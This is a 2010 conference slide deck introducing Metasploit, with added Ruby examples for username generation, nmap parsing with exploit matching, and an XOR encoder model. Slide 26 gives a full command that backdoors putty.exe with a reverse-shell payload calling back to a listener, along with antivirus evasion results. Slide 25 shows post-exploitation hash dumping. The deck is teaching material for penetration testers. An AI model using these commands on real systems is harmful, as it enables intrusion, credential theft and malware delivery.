Metasploit @ 2010 Utah Open Source Conference
Metasploit is a powerful application to use in a penetration test. It is an application that all security professionals and systems administrators should be familiar with. This presentation goes over the basics of Metasploit and some of its many capabilities.

Slide notes (db_autopwn options):
• -t = show all matching exploits
• -x = select modules based on vulnerability references
• -p = select modules based on open ports
• -e = launch exploits against all matched targets
• -r = use a reverse connect shell

1. Free, Powerful, Flexible

2. Warning
• Make sure you have written permission to use apps like Metasploit on systems that are not yours!

3. Metasploit is...

4. History
• Started June 2003 as a response to the anti-disclosure movement
• 1.0 written in Perl and had 11 exploits
• 3.0 complete rewrite in Ruby
• 3.1 released under the BSD license
• Acquired by Rapid7 on Oct 21, 2009
• 3.4.2 (svn) has 590 exploits, 305 auxiliary modules, 225 payloads and 27 encoders

5. Getting Metasploit
• Windows, Linux and UNIX packages
  • http://www.metasploit.com/framework/download/
• Check out directly from the Subversion repository
  • svn co https://www.metasploit.com/svn/framework3/trunk/
• Ruby 1.9.2 - current supported version

6. Interfaces available
• msfcli - Metasploit one-liners from the shell
• msfconsole - text-based interactive console
• msfgui - Java GUI
• msfweb - web interface (not currently supported)
• msfrpcd - XML-RPC server

7. External Applications
• nmap
• Maltego
• Nessus
• Nexpose
• Ratproxy
• Karma

8. Capabilities
• Reconnaissance
• Scanning
• Exploit
• Control and Pivot
• Encode payloads
• Develop Exploits

9. Recon
• Recon modules found in modules/auxiliary/gather/
• DNS enumeration
• Email address collection
• Username generation
  • http://sourceforge.net/projects/reconnoiter/files/
• Shodan
  • http://www.sploitlab.com/files/shodan_enumerator.rb
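Username generation, the recon item the slide points to Reconnoiter for, is worth seeing concretely. The Ruby below is an added example, not code from the deck, from Reconnoiter or from the framework: it takes full names harvested during recon and emits the login and mailbox forms most organizations use, so the output can be fed to a user-enumeration module. The three names, the pattern order and the domain are constructed for the example.

```ruby
# Added example: username/email candidate generation for recon.
# Not code from the slides or the framework; names and domain are constructed.

# Candidate account names for one person, in the patterns most commonly seen
# in corporate directories (first.last, flast, firstl, ...).  Initials and
# punctuation are dropped; one- or two-character results are not useful.
def username_candidates(full_name)
  parts = full_name.downcase.scan(/[a-z]+/)
  return [] if parts.size < 2                  # need at least a first and a last name
  first, last = parts.first, parts.last
  fi, li = first[0], last[0]
  [
    "#{first}.#{last}",  # jason.wood
    "#{first}#{last}",   # jasonwood
    "#{fi}#{last}",      # jwood
    "#{first}#{li}",     # jasonw
    "#{last}#{fi}",      # woodj
    "#{fi}.#{last}",     # j.wood
    "#{last}.#{first}",  # wood.jason
    "#{first}_#{last}",  # jason_wood
    first,               # jason
  ].uniq.reject { |u| u.size < 3 }
end

# Email forms for a harvested name list at one domain (the domain is an assumption).
def email_candidates(names, domain)
  names.flat_map { |n| username_candidates(n) }.uniq.map { |u| "#{u}@#{domain}" }
end

# Constructed sample input: names as they might come back from a people search.
SAMPLE_NAMES = ["Jason Wood", "Alice B. Smith", "H.D. Moore"].freeze

if __FILE__ == $PROGRAM_NAME
  puts email_candidates(SAMPLE_NAMES, "example.com")
end
```

The list is deliberately ordered from most to least common pattern, so a rate-limited check (one attempt per account per hour, say) tries the likely forms first.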
10. Scanning

11. Database setup

12. nmap scanning

13. Loading into utos-msf

14. Exploitation
• Network services - SMTP, FTP, SNMP, HTTP
• Client applications - browsers, PDFs, EXEs
• Wireless - MITM
• Web applications
• Database systems

15. db_autopwn
• Load up a vulnerability scan

16. Score!
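Slides 10 to 15 are one procedure: set up the database, run nmap, load the results, then let db_autopwn pick modules. The screenshots are not on this page, so the Ruby below is an added example (not code from the deck or the framework) of what those steps do with the data: it parses nmap grepable output into hosts and services the way db_import and db_nmap populate the database, then lists candidate exploits per host by open port, which is what db_autopwn -p -t does with the RPORT of every loaded module. The scan text and the four-entry module/port table are constructed for the example; the module names are real, but the table is hand-picked here, not read from the framework.

```ruby
# Added example: nmap -oG parsing plus port-based module matching, modelled on
# db_import / db_autopwn -p -t.  Not framework code; scan text and table are constructed.

# Constructed nmap grepable output (two hosts up, one down).
SAMPLE_GNMAP = <<~GNMAP
  # Nmap 5.21 scan initiated (constructed sample)
  Host: 192.168.1.6 (xp-utos-msf)\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/closed/tcp//ms-term-serv///\tIgnored State: closed (996)
  Host: 192.168.1.20 ()\tPorts: 21/open/tcp//ftp//vsftpd 2.3.4/, 22/open/tcp//ssh//OpenSSH 4.7p1/, 139/open/tcp//netbios-ssn//Samba smbd 3.X/
  Host: 192.168.1.30 ()\tStatus: Down
GNMAP

Service = Struct.new(:host, :port, :proto, :state, :name, :info)

# One Service per port entry, like the rows the `services` command shows.
# Grepable port entries are port/state/proto/owner/name/rpc/version/.
def parse_gnmap(text)
  services = []
  text.each_line do |raw|
    line = raw.chomp
    next unless line.start_with?("Host:")
    host  = line[/\AHost: (\S+)/, 1]
    ports = line[/Ports: ([^\t]+)/, 1] or next   # hosts that are down have no Ports: field
    ports.split(/,\s*/).each do |entry|
      port, state, proto, _owner, name, _rpc, info = entry.split("/", -1)
      services << Service.new(host, port.to_i, proto, state, name, info)
    end
  end
  services
end

# Hand-picked subset: module name => default RPORT.  The real db_autopwn
# builds this from every loaded exploit; these four entries are an assumption.
MODULE_PORTS = {
  "exploit/windows/dcerpc/ms03_026_dcom" => 135,
  "exploit/windows/smb/ms08_067_netapi"  => 445,
  "exploit/multi/samba/usermap_script"   => 139,
  "exploit/unix/ftp/vsftpd_234_backdoor" => 21,
}.freeze

# Port-based selection (-p): a module is a candidate for a host when its RPORT
# is open there.  -t prints this list; -e would launch every entry.
def autopwn_candidates(services, table = MODULE_PORTS)
  services.select { |s| s.state == "open" }.flat_map do |s|
    table.select { |_mod, rport| rport == s.port }.keys.map { |m| [s.host, s.port, m] }
  end
end

if __FILE__ == $PROGRAM_NAME
  autopwn_candidates(parse_gnmap(SAMPLE_GNMAP)).each { |h, p, m| puts "#{h}:#{p}  #{m}" }
end
```

Matching on port alone says nothing about whether the service is actually vulnerable, so -e fires a blind attempt at every candidate (noisy, and some of those exploits can crash the service). That is why the slide loads a vulnerability scan first: -x matches on the vulnerability references the scan imported, a far shorter and quieter list.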
17. Control and Pivot
• Meterpreter - Windows
• Meterpretux - Linux/POSIX
• Machterpreter - OS X
• Meterpreter in PHP

18. More Meterpreter
• Act as a router for Metasploit: route further attacks through the compromised host
• Execute scripted actions
• Download password hashes
• Migrate between processes
• Key logging, screen capture, edit registry
• 54 different scripts in scripts/meterpreter

19. Meterpreter Commands

20. commands continued...

21. networking

22. system

23. userland

24. privileged commands

25. Meterpreter Scripts
meterpreter > run winenum
[*] Running Windows Local Enumerion Meterpreter Script
[*] New session on 192.168.1.6:1042...
[*] Saving general report to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111/XP-UTOS-MSF_20101007.2111.txt
[*] Output of each individual command is saved to /Users/jwood/.msf3/logs/scripts/winenum/XP-UTOS-MSF_20101007.2111
[*] Checking if XP-UTOS-MSF is a Virtual Machine ........
[*] This is a VMWare virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command arp -a
[*] running command ipconfig /all
[*] running command ipconfig /displaydns
[*] running command route print
[*] running command net view
[*] running command netstat -vb
[*] running command netstat -ns
[*] running command net accounts
.....snip....
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
26. Backdooring Files
• PDF, EXE, Audio, Flash and more
• ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=8080 R | ./msfencode -t exe -x /tmp/putty.exe -o /tmp/putty_backdoored.exe -e x86/shikata_ga_nai -c 5
  (-x uses the existing putty.exe as the template the payload is injected into; -e x86/shikata_ga_nai -c 5 runs the encoder over the payload five times)
• Tested files on VirusTotal.com
  • PDF - 20 of 42 AV apps detected
  • EXE - 2 of 42 AV apps detected
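The msfencode step above is what produced the 2-of-42 result for the EXE: every -c iteration XORs the payload with a fresh random key using additive feedback, so the payload bytes a static signature would look for are not in the file and every run differs. The Ruby below is an added example, not the framework's encoder: it is a simplified model of the data transform only (the real x86/shikata_ga_nai also emits a polymorphic x86 decoder stub and is not bit-for-bit this algorithm). The 16-byte payload stand-in is constructed.

```ruby
# Added example: simplified model of an XOR additive-feedback encoder.
# Not the framework's x86/shikata_ga_nai; payload bytes below are constructed.

# One round: XOR each little-endian dword with the key, then advance the key
# by the plaintext dword (the "additive feedback").  Data is zero-padded to a
# dword boundary, as a real encoder would do.
def xor_feedback_encode(data, key)
  buf = data.b + ("\0" * ((4 - data.bytesize % 4) % 4))
  out = String.new(encoding: Encoding::BINARY)
  buf.unpack("V*").each do |dword|
    out << [dword ^ key].pack("V")
    key = (key + dword) & 0xffffffff
  end
  out
end

# Mirrors what the decoder stub does at run time: XOR to recover the dword,
# then add the recovered dword to the key before moving on.
def xor_feedback_decode(data, key)
  out = String.new(encoding: Encoding::BINARY)
  data.unpack("V*").each do |enc|
    dword = enc ^ key
    out << [dword].pack("V")
    key = (key + dword) & 0xffffffff
  end
  out
end

# `-c N` = N rounds, each with its own random key.  In real output the keys
# live inside the chained decoder stubs; here they are returned to the caller.
def encode_rounds(data, count, rng = Random.new)
  keys = Array.new(count) { rng.rand(1..0xffffffff) }
  encoded = keys.inject(data.b) { |buf, k| xor_feedback_encode(buf, k) }
  [encoded, keys]
end

# Undo the rounds in reverse order.
def decode_rounds(data, keys)
  keys.reverse.inject(data.b) { |buf, k| xor_feedback_decode(buf, k) }
end

# Constructed 16-byte stand-in for a payload (not working shellcode).
SAMPLE_PAYLOAD = [0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89,
                  0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b].pack("C*").freeze

# The static check an AV signature amounts to: are these bytes in the file?
def signature_present?(blob, signature)
  blob.b.include?(signature.b)
end

if __FILE__ == $PROGRAM_NAME
  enc, keys = encode_rounds(SAMPLE_PAYLOAD, 5)
  puts "encoded:       #{enc.unpack1('H*')}"
  puts "signature hit: #{signature_present?(enc, SAMPLE_PAYLOAD[0, 8])}"
  puts "decodes back:  #{decode_rounds(enc, keys) == SAMPLE_PAYLOAD}"
end
```

What the model leaves out is the part detection actually keys on: the decoder stub itself, which is why encoding alone stops helping once a vendor signatures the stub, and why the PDF (whose exploit code is not encoded this way) scored 20 of 42 while the EXE scored 2.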
27. Developing a Module
• Got something you want to exploit?

28. For example...

29. Resources
• IRC: freenode.net, #metasploit
• metasploit.com
• http://www.offensive-security.com/metasploit-unleashed/
• Securitytube.net
• Slides at http://jwnetworkconsulting.com/downloads/utos-msf-2010.pdf

30. Questions?
• jwnetworkconsulting.com
• Email: tadaka__AT__gmail.com
• IRC: tadaka
• Twitter: Jason_Wood